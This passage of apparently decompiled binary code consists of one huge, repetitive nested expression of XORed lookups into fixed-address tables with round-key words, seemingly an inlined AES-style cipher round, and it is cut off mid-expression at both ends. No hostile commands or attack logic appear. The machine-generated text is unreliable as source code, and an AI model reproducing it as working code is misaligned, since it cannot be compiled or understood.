0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x18) * 4) ^  *(0x4141c8 + (_t243 & 0x000000ff) * 4) ^ _t257[5]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x18) * 4) ^  *(0x4141c8 + (_t243 & 0x000000ff) * 4) ^ _t257[5]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4141c8 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4141c8 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + (( *(0x4149c8 + (( *(0x4149c8 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4145c8 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x414dc8 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4141c8 + 